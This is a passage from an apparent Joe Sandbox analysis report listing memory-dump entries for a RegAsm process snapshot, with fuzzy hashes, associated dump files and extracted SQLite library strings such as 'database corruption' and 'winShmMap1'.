                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %!.15g$-$YHI;
                                                                                                                                                                                                                                                              • API String ID: 0-593447808
                                                                                                                                                                                                                                                              • Opcode ID: 7b91b45e907c1f34838c78e791b07b4f199f189b2f69d0913f1b987191b4422e
                                                                                                                                                                                                                                                              • Instruction ID: f9cfe8bb1d6360ed737741137e072de58616905d9adf89b151b67b44fb348423
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b91b45e907c1f34838c78e791b07b4f199f189b2f69d0913f1b987191b4422e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A917771A083428FD304DF6DD89175AFBE4EBC8344F48492DE889CB351E7B9D9098B92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: integer overflow
                                                                                                                                                                                                                                                              • API String ID: 0-1678498654
                                                                                                                                                                                                                                                              • Opcode ID: 35c1880a8e92f995712971bc958d6bb048eee0cd7a31d1dd2fdb7005ef371397
                                                                                                                                                                                                                                                              • Instruction ID: 7c9b78707625d9f66ce28a4062d7f010f5cfc51bffd3213a138d2c8a3d9a6f46
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35c1880a8e92f995712971bc958d6bb048eee0cd7a31d1dd2fdb7005ef371397
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11112675C047156FEB01AF28FC00B8A37A16F26321F9D539DE8991A1E2E761D2C4C3D2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                                                                              • API String ID: 0-3826999013
                                                                                                                                                                                                                                                              • Opcode ID: a2c2b9ee19ddfed1c2de12b45b9fce2e46628c5a6b59190b336d94fad1aa6164
                                                                                                                                                                                                                                                              • Instruction ID: 9e1579036b6821c0e4200fd7bb40597b14b367576e34fb0a1163d341a5fe18bd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2c2b9ee19ddfed1c2de12b45b9fce2e46628c5a6b59190b336d94fad1aa6164
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D6123725007419FD710EF29CC80A27B7E9FF94745F49482DF98697281EB35EA09CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198635EA
                                                                                                                                                                                                                                                              • misuse, xrefs: 198635F4
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 198635F9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-3564305576
                                                                                                                                                                                                                                                              • Opcode ID: 9bde22511a94f2575e3481fb48feb197530855a6197270ba59c168f3cf35a180
                                                                                                                                                                                                                                                              • Instruction ID: cf8554d3465a09780c4b754f7f5554e8bf188e9de8d15ed8ad5a0395fe5360dd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bde22511a94f2575e3481fb48feb197530855a6197270ba59c168f3cf35a180
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D51F5F1A04315AFC7048F18C884A56BBA4FF54724F0D817EF85A9F2A2E331E854CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198D97E0
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 198D97EF
                                                                                                                                                                                                                                                              • database corruption, xrefs: 198D97EA
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: 1fb1e49cb7f46e67c34486a2384c0349f6f802b52bcb000ee912525426a30d5e
                                                                                                                                                                                                                                                              • Instruction ID: 86cb08db9971e548fe5a7985cb010edfce10568b5a85781b76954f3f77d32db7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fb1e49cb7f46e67c34486a2384c0349f6f802b52bcb000ee912525426a30d5e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7541167A2067908FD3218F7CD440AD7FBF2AF51211F1C48AED2D68B692E223E485D361
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199A5976
                                                                                                                                                                                                                                                              • misuse, xrefs: 199A5980
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 199A5985
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-3564305576
                                                                                                                                                                                                                                                              • Opcode ID: 3c330e1eb9385448d6df0858b64d7da470647767873d9bbaec00a44ad285fad4
                                                                                                                                                                                                                                                              • Instruction ID: 78be79e2a748df3757c3a7eabbd554b7dfe0ffea3243971ecfdbbead8a0ecb8d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c330e1eb9385448d6df0858b64d7da470647767873d9bbaec00a44ad285fad4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5410476B04351ABD301CA55CC80B9EB7A8EF85320F8C556DF9849B241E329E994C7A3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198653FE
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 1986540D
                                                                                                                                                                                                                                                              • database corruption, xrefs: 19865408
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: 8ef44817704165972759228da5e144cf1a1c7f341bdee3e5b0900e6c7f1e0242
                                                                                                                                                                                                                                                              • Instruction ID: 059d7009e11876be12cc071081896bed474a75d157b03cab6ff9db100baf0020
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ef44817704165972759228da5e144cf1a1c7f341bdee3e5b0900e6c7f1e0242
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03319BAA24479146D3218F38D8407E7B7E19F52B12F4C44AEE9C5CB6E1E312F486C371
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • error in tokenizer constructor, xrefs: 19947F92
                                                                                                                                                                                                                                                              • no such tokenizer: %s, xrefs: 19947F1B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: error in tokenizer constructor$no such tokenizer: %s
                                                                                                                                                                                                                                                              • API String ID: 0-815501780
                                                                                                                                                                                                                                                              • Opcode ID: 3b1c16bc85e4ef65acb5f4ed35029b23e9e3ae5995954ff93fcc6dd23cffb1f4
                                                                                                                                                                                                                                                              • Instruction ID: a7f94b0b81d1246ec10414dc063b0d8620500791eb2c733a42dffc645bb85115
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b1c16bc85e4ef65acb5f4ed35029b23e9e3ae5995954ff93fcc6dd23cffb1f4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F31C3767002198FC722CF19D880A5AB3E8EF85665F2845ADE988DB340E732EC05CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • second argument to nth_value must be a positive integer, xrefs: 1982F0C4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: second argument to nth_value must be a positive integer
                                                                                                                                                                                                                                                              • API String ID: 0-2620530100
                                                                                                                                                                                                                                                              • Opcode ID: d63c0fd1c2a39eb5aab9c0555bba6026a99bfb944b45bc1fbf19a599af1af6ca
                                                                                                                                                                                                                                                              • Instruction ID: 1cef08b7e4760b30bb6defff0702e879d7a1b3528d008bd8b0435b78c48ce512
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d63c0fd1c2a39eb5aab9c0555bba6026a99bfb944b45bc1fbf19a599af1af6ca
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6310AB69043129BD7119F28DC4161A77E0BF50720FCC862DFCA5A62D1E732E9D5CA92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198652F2
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 19865301
                                                                                                                                                                                                                                                              • database corruption, xrefs: 198652FC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: 9803d71e240a1bf2e868aad449e010d54dfb594fdd95c349f9c68a18515f29b7
                                                                                                                                                                                                                                                              • Instruction ID: 5e924f2271d2fba1f2cfd065fdb8bc4be4baac58b7a32149864aaa2bdfaaae16
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9803d71e240a1bf2e868aad449e010d54dfb594fdd95c349f9c68a18515f29b7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D611357B60011067CB105A58FC00CDBBBA5EFC56B6F4D4569FA485B222E623E921D3F1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1986FDE6, 1986FE61
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 1986FE82
                                                                                                                                                                                                                                                              • database corruption, xrefs: 1986FE7D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
